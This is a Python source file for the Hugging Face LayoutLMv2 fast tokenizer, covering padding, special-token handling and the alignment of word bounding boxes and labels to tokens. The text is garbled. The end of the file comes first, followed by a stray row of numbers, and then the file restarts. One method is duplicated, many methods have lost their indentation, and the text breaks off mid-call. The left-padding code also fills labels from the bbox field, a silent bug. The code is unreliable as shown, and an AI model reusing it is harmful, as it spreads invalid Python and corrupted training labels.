word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
``__call__`` should be used instead.
Args:
text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (:obj:`List[str]` or :obj:`List[int]`, `optional`):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs: Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
>= 7.5 (Volta).
return_attention_mask: (optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["bbox"]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BERT sequence has the following format:
- single sequence: ``[CLS] X [SEP]``
- pair of sequences: ``[CLS] A [SEP] B [SEP]``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
if token_ids_1:
output += token_ids_1 + [self.sep_token_id]
return output
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A BERT sequence
pair mask has the following format: :: 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 | first sequence | second
sequence | If :obj:`token_ids_1` is :obj:`None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `token type IDs <../glossary.html#token-type-ids>`_ according to the given
sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
| 47.174289 | 132 | 0.626742 | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fast tokenization class for LayoutLMv2. It overwrites 2 methods of the slow tokenizer class, namely _batch_encode_plus
and _encode_plus, in which the Rust tokenizer is used.
"""
import json
from typing import Dict, List, Optional, Tuple, Union
from tokenizers import normalizers
from ...file_utils import PaddingStrategy, TensorType, add_end_docstrings
from ...tokenization_utils_base import (
ENCODE_KWARGS_DOCSTRING,
BatchEncoding,
EncodedInput,
PreTokenizedInput,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
from .tokenization_layoutlmv2 import LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING, LayoutLMv2Tokenizer
# Module-level logger for this tokenizer implementation.
logger = logging.get_logger(__name__)
# Local file names expected for the slow (vocab) and fast (serialized) tokenizer assets.
VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt", "tokenizer_file": "tokenizer.json"}
# Hub download URLs for each pretrained checkpoint's tokenizer assets.
PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/vocab.txt",
    },
    "tokenizer_file": {
        "microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/tokenizer.json",
    },
}
# Maximum sequence length supported by each checkpoint's position embeddings.
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "microsoft/layoutlmv2-base-uncased": 512,
}
# Checkpoint-specific constructor defaults applied when loading from the Hub.
PRETRAINED_INIT_CONFIGURATION = {
    "microsoft/layoutlmv2-base-uncased": {"do_lower_case": True},
}
class LayoutLMv2TokenizerFast(PreTrainedTokenizerFast):
r"""
Construct a "fast" LayoutLMv2 tokenizer (backed by HuggingFace's `tokenizers` library). Based on WordPiece.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizerFast` which contains most of the main
methods. Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
File containing the vocabulary.
do_lower_case (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to lowercase the input when tokenizing.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
cls_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[1000, 1000, 1000, 1000]`):
The bounding box to use for the special [SEP] token.
pad_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (:obj:`int`, `optional`, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the :obj:`ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to only label the first subword, in case word labels are provided.
tokenize_chinese_chars (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to tokenize Chinese characters. This should likely be deactivated for Japanese (see `this
issue <https://github.com/huggingface/transformers/issues/328>`__).
strip_accents: (:obj:`bool`, `optional`):
Whether or not to strip all accents. If this option is not specified, then it will be determined by the
value for :obj:`lowercase` (as in the original LayoutLMv2).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
slow_tokenizer_class = LayoutLMv2Tokenizer
    def __init__(
        self,
        vocab_file=None,
        tokenizer_file=None,
        do_lower_case=True,
        unk_token="[UNK]",
        sep_token="[SEP]",
        pad_token="[PAD]",
        cls_token="[CLS]",
        mask_token="[MASK]",
        # NOTE(review): the list defaults below are shared mutable defaults; safe as long as no
        # caller mutates them in place — consider the None-sentinel pattern if that ever changes.
        cls_token_box=[0, 0, 0, 0],
        sep_token_box=[1000, 1000, 1000, 1000],
        pad_token_box=[0, 0, 0, 0],
        pad_token_label=-100,
        only_label_first_subword=True,
        tokenize_chinese_chars=True,
        strip_accents=None,
        **kwargs
    ):
        """
        Construct the fast tokenizer: delegates asset loading and special-token setup to the
        :class:`~transformers.PreTrainedTokenizerFast` base class, re-synchronizes the backend
        normalizer with the requested casing options, and stores the LayoutLMv2-specific
        bounding-box/label defaults as instance attributes.
        """
        super().__init__(
            vocab_file,
            tokenizer_file=tokenizer_file,
            do_lower_case=do_lower_case,
            unk_token=unk_token,
            sep_token=sep_token,
            pad_token=pad_token,
            cls_token=cls_token,
            mask_token=mask_token,
            cls_token_box=cls_token_box,
            sep_token_box=sep_token_box,
            pad_token_box=pad_token_box,
            pad_token_label=pad_token_label,
            only_label_first_subword=only_label_first_subword,
            tokenize_chinese_chars=tokenize_chinese_chars,
            strip_accents=strip_accents,
            **kwargs,
        )
        # The backend (Rust) tokenizer serializes its normalizer state as JSON; inspect it to see
        # whether the loaded tokenizer.json agrees with the casing options requested here.
        pre_tok_state = json.loads(self.backend_tokenizer.normalizer.__getstate__())
        if (
            pre_tok_state.get("lowercase", do_lower_case) != do_lower_case
            or pre_tok_state.get("strip_accents", strip_accents) != strip_accents
        ):
            # Mismatch: rebuild the normalizer of the same type with the requested
            # lowercase/strip_accents values so the backend honors the constructor arguments.
            pre_tok_class = getattr(normalizers, pre_tok_state.pop("type"))
            pre_tok_state["lowercase"] = do_lower_case
            pre_tok_state["strip_accents"] = strip_accents
            self.backend_tokenizer.normalizer = pre_tok_class(**pre_tok_state)
        self.do_lower_case = do_lower_case
        # additional properties
        self.cls_token_box = cls_token_box
        self.sep_token_box = sep_token_box
        self.pad_token_box = pad_token_box
        self.pad_token_label = pad_token_label
        self.only_label_first_subword = only_label_first_subword
    @add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    def __call__(
        self,
        text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
        text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
        boxes: Union[List[List[int]], List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = False,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs
    ) -> BatchEncoding:
        """
        Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
        sequences with word-level normalized bounding boxes and optional labels.

        Args:
            text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
                (words of a single example or questions of a batch of examples) or a list of list of strings (batch of
                words).
            text_pair (:obj:`List[str]`, :obj:`List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
                (pretokenized string).
            boxes (:obj:`List[List[int]]`, :obj:`List[List[List[int]]]`):
                Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
            word_labels (:obj:`List[int]`, :obj:`List[List[int]]`, `optional`):
                Word-level integer labels (for token classification tasks such as FUNSD, CORD).
        """
        # Input type checking for clearer error
        def _is_valid_text_input(t):
            # Accepts: a plain string, a (possibly empty) list/tuple of strings, or a
            # list/tuple of lists/tuples of strings; rejects everything else.
            if isinstance(t, str):
                # Strings are fine
                return True
            elif isinstance(t, (list, tuple)):
                # List are fine as long as they are...
                if len(t) == 0:
                    # ... empty
                    return True
                elif isinstance(t[0], str):
                    # ... list of strings
                    return True
                elif isinstance(t[0], (list, tuple)):
                    # ... list with an empty list or with a list of strings
                    return len(t[0]) == 0 or isinstance(t[0][0], str)
                else:
                    return False
            else:
                return False
        if text_pair is not None:
            # in case text + text_pair are provided, text = questions, text_pair = words
            if not _is_valid_text_input(text):
                raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
            if not isinstance(text_pair, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )
        else:
            # in case only text is provided => must be words
            if not isinstance(text, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )
        # With a question (text_pair), a list `text` already signals a batch; without one,
        # batching is signaled by `text` being a list of lists of words.
        if text_pair is not None:
            is_batched = isinstance(text, (list, tuple))
        else:
            is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
        # Bounding boxes are always aligned to the *words*: `text` alone, or `text_pair`
        # when a question is supplied.
        words = text if text_pair is None else text_pair
        assert boxes is not None, "You must provide corresponding bounding boxes"
        if is_batched:
            assert len(words) == len(boxes), "You must provide words and boxes for an equal amount of examples"
            for words_example, boxes_example in zip(words, boxes):
                assert len(words_example) == len(
                    boxes_example
                ), "You must provide as many words as there are bounding boxes"
        else:
            assert len(words) == len(boxes), "You must provide as many words as there are bounding boxes"
        # Dispatch to the batched or single-example entry point with identical arguments.
        if is_batched:
            if text_pair is not None and len(text) != len(text_pair):
                raise ValueError(
                    f"batch length of `text`: {len(text)} does not match batch length of `text_pair`: {len(text_pair)}."
                )
            batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
            is_pair = bool(text_pair is not None)
            return self.batch_encode_plus(
                batch_text_or_text_pairs=batch_text_or_text_pairs,
                is_pair=is_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
        else:
            return self.encode_plus(
                text=text,
                text_pair=text_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
""" """
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
def tokenize(self, text: str, pair: Optional[str] = None, add_special_tokens: bool = False, **kwargs) -> List[str]:
batched_input = [(text, pair)] if pair else [text]
encodings = self._tokenizer.encode_batch(
batched_input, add_special_tokens=add_special_tokens, is_pretokenized=False, **kwargs
)
return encodings[0].tokens
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
``__call__`` should be used instead.
Args:
text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (:obj:`List[str]` or :obj:`List[int]`, `optional`):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
    def _batch_encode_plus(
        self,
        batch_text_or_text_pairs: Union[
            List[TextInput],
            List[TextInputPair],
            List[PreTokenizedInput],
        ],
        is_pair: bool = None,
        boxes: Optional[List[List[List[int]]]] = None,
        word_labels: Optional[List[List[int]]] = None,
        add_special_tokens: bool = True,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[str] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
    ) -> BatchEncoding:
        """
        Encode a batch with the Rust backend, then align the word-level `boxes` (and optional
        `word_labels`) to the produced tokens using the backend's word_ids/sequence_ids/offsets,
        adding "bbox" (and "labels") entries to the returned :class:`BatchEncoding`.
        """
        if not isinstance(batch_text_or_text_pairs, list):
            raise TypeError(f"batch_text_or_text_pairs has to be a list (got {type(batch_text_or_text_pairs)})")
        # Set the truncation and padding strategy and restore the initial configuration
        self.set_truncation_and_padding(
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
        )
        if is_pair:
            # For question-answering style input the question string is whitespace-split so the
            # whole pair can be fed as pretokenized input below.
            batch_text_or_text_pairs = [(text.split(), text_pair) for text, text_pair in batch_text_or_text_pairs]
        encodings = self._tokenizer.encode_batch(
            batch_text_or_text_pairs,
            add_special_tokens=add_special_tokens,
            is_pretokenized=True,  # we set this to True as LayoutLMv2 always expects pretokenized inputs
        )
        # Convert encoding to dict
        # `Tokens` has type: Tuple[
        #                       List[Dict[str, List[List[int]]]] or List[Dict[str, 2D-Tensor]],
        #                       List[EncodingFast]
        #                    ]
        # with nested dimensions corresponding to batch, overflows, sequence length
        tokens_and_encodings = [
            self._convert_encoding(
                encoding=encoding,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=True
                if word_labels is not None
                else return_offsets_mapping,  # we use offsets to create the labels
                return_length=return_length,
                verbose=verbose,
            )
            for encoding in encodings
        ]
        # Convert the output to have dict[list] from list[dict] and remove the additional overflows dimension
        # From (variable) shape (batch, overflows, sequence length) to ~ (batch * overflows, sequence length)
        # (we say ~ because the number of overflow varies with the example in the batch)
        #
        # To match each overflowing sample with the original sample in the batch
        # we add an overflow_to_sample_mapping array (see below)
        sanitized_tokens = {}
        for key in tokens_and_encodings[0][0].keys():
            stack = [e for item, _ in tokens_and_encodings for e in item[key]]
            sanitized_tokens[key] = stack
        sanitized_encodings = [e for _, item in tokens_and_encodings for e in item]
        # If returning overflowing tokens, we need to return a mapping
        # from the batch idx to the original sample
        if return_overflowing_tokens:
            overflow_to_sample_mapping = []
            for i, (toks, _) in enumerate(tokens_and_encodings):
                overflow_to_sample_mapping += [i] * len(toks["input_ids"])
            sanitized_tokens["overflow_to_sample_mapping"] = overflow_to_sample_mapping
        for input_ids in sanitized_tokens["input_ids"]:
            self._eventual_warn_about_too_long_sequence(input_ids, max_length, verbose)
        # create the token boxes
        token_boxes = []
        for batch_index in range(len(sanitized_tokens["input_ids"])):
            # Map each (possibly overflowed) row back to its source example so the right
            # word-level boxes are looked up.
            if return_overflowing_tokens:
                original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
            else:
                original_index = batch_index
            token_boxes_example = []
            # NOTE(review): the loop variable `id` shadows the builtin of the same name.
            for id, sequence_id, word_id in zip(
                sanitized_tokens["input_ids"][batch_index],
                sanitized_encodings[batch_index].sequence_ids,
                sanitized_encodings[batch_index].word_ids,
            ):
                if word_id is not None:
                    # Question tokens (sequence 0 of a pair) carry no layout box of their own.
                    if is_pair and sequence_id == 0:
                        token_boxes_example.append(self.pad_token_box)
                    else:
                        token_boxes_example.append(boxes[original_index][word_id])
                else:
                    # Special tokens get their dedicated boxes.
                    if id == self.cls_token_id:
                        token_boxes_example.append(self.cls_token_box)
                    elif id == self.sep_token_id:
                        token_boxes_example.append(self.sep_token_box)
                    elif id == self.pad_token_id:
                        token_boxes_example.append(self.pad_token_box)
                    else:
                        raise ValueError("Id not recognized")
            token_boxes.append(token_boxes_example)
        sanitized_tokens["bbox"] = token_boxes
        # optionally, create the labels
        if word_labels is not None:
            labels = []
            for batch_index in range(len(sanitized_tokens["input_ids"])):
                if return_overflowing_tokens:
                    original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
                else:
                    original_index = batch_index
                labels_example = []
                for id, offset, word_id in zip(
                    sanitized_tokens["input_ids"][batch_index],
                    sanitized_tokens["offset_mapping"][batch_index],
                    sanitized_encodings[batch_index].word_ids,
                ):
                    if word_id is not None:
                        if self.only_label_first_subword:
                            # offset[0] == 0 identifies the first subword of a word.
                            if offset[0] == 0:
                                # Use the real label id for the first token of the word, and padding ids for the remaining tokens
                                labels_example.append(word_labels[original_index][word_id])
                            else:
                                labels_example.append(self.pad_token_label)
                        else:
                            labels_example.append(word_labels[original_index][word_id])
                    else:
                        labels_example.append(self.pad_token_label)
                labels.append(labels_example)
            sanitized_tokens["labels"] = labels
        # finally, remove offsets if the user didn't want them
        if not return_offsets_mapping:
            del sanitized_tokens["offset_mapping"]
        return BatchEncoding(sanitized_tokens, sanitized_encodings, tensor_type=return_tensors)
def _encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[bool] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
# make it a batched input
# 2 options:
# 1) only text, in case text must be a list of str
# 2) text + text_pair, in which case text = str and text_pair a list of str
batched_input = [(text, text_pair)] if text_pair else [text]
batched_boxes = [boxes]
batched_word_labels = [word_labels] if word_labels is not None else None
batched_output = self._batch_encode_plus(
batched_input,
is_pair=bool(text_pair is not None),
boxes=batched_boxes,
word_labels=batched_word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
